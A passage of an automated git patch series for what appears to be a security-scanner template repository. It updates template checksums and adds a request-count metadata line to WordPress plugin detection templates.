-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7009,7 +7009,7 @@ network/misconfig/printers-info-leak.yaml:cb6c13a840a2765acf43726c754aa243b01011 network/misconfig/sap-router-info-leak.yaml:008df0e634639e012bd67b242172b20d93b92630 network/misconfig/tidb-native-password.yaml:ee468366b1737d416807ecb51feae7b35ed27a4f network/misconfig/tidb-unauth.yaml:98ce03032751882e00f5ea0880511d5aa356de74 -network/misconfig/unauth-psql.yaml:d8fabe714301496ce3446d24e6b93b9fbfe2b744 +network/misconfig/unauth-psql.yaml:c54c9c89d460a71bc82267bd5737dbde45e53122 network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a @@ -7036,7 +7036,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:272c1a440729834144e60562cb0ccd0100a62050 +templates-checksum.txt:f953a64e1459c669bcb46683410d26467b1d34c2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 7c3bb7399c8a72d277813dc13a81b0a9407587d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 02:26:44 +0000 Subject: [PATCH 0100/1090] TemplateMan Update [Mon Sep 4 02:26:44 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git 